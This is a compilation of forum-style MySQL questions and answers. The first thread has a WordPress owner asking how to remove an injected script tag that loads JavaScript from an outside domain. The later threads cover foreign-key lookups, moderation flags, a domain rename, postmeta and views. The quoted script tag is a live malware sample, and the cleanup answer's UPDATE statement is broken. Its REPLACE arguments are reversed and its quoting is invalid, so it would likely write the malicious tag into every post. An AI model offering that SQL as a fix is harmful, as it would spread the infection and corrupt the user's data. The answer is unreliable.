Cleaning injected javascript reference in MYSQL database - mysql

I am trying to clean up a wordpress database of an infected site.
I have very little knowledge of mysql, i have been trying a couple options with bad results so far.
I attached a few images showing the issue, and this is the html code that ends up on the pages:
title="<script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>"
My failed attempts included clicking on that DELETE button, so the whole site breaks of course.
I do have a backups so i can play safe.
I know there should be a simple "find and replace" function to remove the script from the tables, but im not sure if i should be looking for anything else, as you can see there is actually more stuff in the HTML code (the #039 part for example, i just want to make sure i remove everything correctly.
Thank you so much for any help.

A simple string replace call with a table update in MySQL looks like this:
UPDATE wp_posts
SET post_content = REPLACE(
'<script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>',
'',
post_content
);
I am not sure if your data is really encoded (I guess yes), otherwise use < instead of < etc.
This does not cover variations but is the most basic way of "find and replace" in native MySQL. It does not cover blankspaces and returns tho, I think you should play arround with it.
Even simpler approach
would be to open the dump in your favorite text editor (I suggest Notepad++ because it has Regex search & replace) and just go through that file the manual way.

Do not forget to check terms, comments, and post_meta tables as well. Potentially, your site breaks because you mess up the data integrity. Do not start by deleting stuff. Start by identifying affected tables & rows. Then work out the relationships between affected rows and other DB objects, delete all the bad stuff at once.
This could help a lot: https://codex.wordpress.org/Database_Description

Related

MySQL Foreign Key Lookup in Editor

I am flummoxed that no one seems to have ever asked this question, which indicates that the question itself is flawed. But, I don't know how to find out the right question, or answer, other than asking, so here goes:
I'm trying out a couple of tools to connect to MySQL databases and view and edit the data. So far I've tried MySQL Workbench and Database Browser. MySQL Workbench seems to be much more robust and lets you set up foreign keys without having to write any SQL.
The problem, though, is that when inserting and updating data in columns that are foreign keys, I have to manually enter the numeric id of the parent row, and once entered, I have to manually look up which record that number refers to if I want to know. Is there no way to set a display field in the parent table and then be able to choose a value off a dropdown menu when editing the child table? phpMyAdmin does this. I'm perplexed that, not only can't I find a way to achieve this in any non-web-based database tool (I've tried Access before, too), but that no one seems ever to have needed to do it before. Am I completely thinking about this wrong? Do people not use these tools to do this type of work? Is everyone writing their own custom lookup interfaces from scratch in Qbasic? Should I memorize all the ids for my parent rows?
Or are people laughing up their sleeves at this question because it's framed so awkwardly?
SQLYog provides such functionality
https://blog.webyog.com/wp-content/uploads/2011/04/FK-Dropdown1.png

User submitted content to mysql with moderation: separate table?

In an mysql table I would like to get data from user, however the data would need to be moderated by admin first. My question is that is it normal to just insert into the original table and use a field as flag of the moderation status? Or have a separate table of pre-moderated posts and do the insertions only at moderation?
I think both method would work but I am not sure if I miss out other considerations here. Hope someone experienced can tell me the established/preferred way to do that.
If you're working with a not-huge data set I'd recommend just adding a flag column that allows you to show or hide user data. This will require fewer and easier queries to work with and should make your life a lot easier than juggling the data between multiple identical tables. Additionally, if you want to add something like a button for "report this content as BAD" you could remove the content from other results while only "soft deleting" it from public visibility.

Replace MySQL values in over 120 tables

We have redirect huge internet service from domain .de to domain .com - this is discussion board (vBulletin). At the moment we need to change all phrases like "domainame.de" to "domainame.com":
Over 120 tables (posts, threads)
A lot of MySQL fields
Anyone have suggestion how do something like this? We need replace string "domainame.de" to "domainname.com" - everywhere.
What you want to do sounds dangerous, as it could hit some false-positives, and change things unintentionally. Suppose your old domain is 'acme.de' and the new one 'acme.com', and some random visitor posted the following (this is an over-simplified example):
I enjoy working with Acme.Depending on my mood.
It would be very easy to convert this to:
I enjoy working with Acme.compending on my mood.
Therefore, my suggestions, in order of preference:
Don't update the DB at all, just configure your web server to redirect the .de traffic to the .com traffic. You're less likely to make mistakes this way.
If you must update the discussion board, do it in your display logic, rather than in the database--then you'll have no chance of making irrevocable mistakes.
Write a script in perl, or your favorite text-processing language, language, which does a regex replacement on every table/field. I suggest the following strategy:
a. Do a SELECT id,<field name> FROM <table> WHERE <field name> LIKE '%domain.de%'
b. Store output in a CSV, or other format that is easy to parse.
c. Run your Regex script to change domain.de to domain.com
d. Check the output.
e. Do an UPDATE <table> SET <field>=? WHERE id=?, with the output of your script.
Do it in small chunks at first (a few tens or hundreds of posts at a time), and visually check the results before committing your changes to the database, to make sure you haven't made mistakes.
I dont know whether this might work for you but have a look at this
The following query would give you the list of tables (120 tables)
SELECT DISTINCT table_name
FROM
(
SELECT *
FROM information_schema.`COLUMNS` C
) t1
WHERE TABLE_SCHEMA='schema_name'
next
you can use UPDATE query for each table. you can achieve this using CURSORS
I am not good in cursors but I think it will help in this situation

insert wordpress custom field content into wordpress post using SQL

I need a sql query that will allow me to take the contents of a Wordpress custom field and insert them into the existing post (post_content). I have thousands of record that I need to do this with.
My limited SQL knowledge isnt good enough to figure this out since the the custom fields are stored in the "wp_postmeta" table and the post content is stored in the "wp_posts" table.
Thanks
You don't need to (and you most definitely don't WANT to) use SQL to do what you want.
Since you haven't actually tried anything yet, you should take a look at Update Post Meta if you want to make sure all of your tables are populated correctly, and everything is referenced properly according to Wordpress' standards.
If you run into any issues with writing the actual code to handle this, please open a new question and show us what you've tried.
Good luck.

mysql don't return results if not from statement but from INDEX table or something

I think my question was a little confusing.....It confused me :)
Working on a media site as a take-over project and it has a custom CMS. The client wants the ability to activate/deactivate media....sort of like Wordpress's publish/unpublish feature.
Instead of digging through all the code looking for mysql queries (which I'm not opposed to), I was wondering if you can add a sort of INDEX to a table that won't let it return result rows if that rows "active" column = let's say 0.
Just trying to be lazy and learn something at the same time, heh.
I don't need examples of queries to make it happen, btw.
What you describe is called a "view". Here is a page describing how to create them in MySQL: http://dev.mysql.com/doc/refman/5.0/en/create-view.html. However, in most cases you will still have to alter your code to use the view instead of the table.
You can consider create a view (which contains active record only)
AND swap the view name to actual table name instead, so you can achieve the negative filtering without changing any of your source code.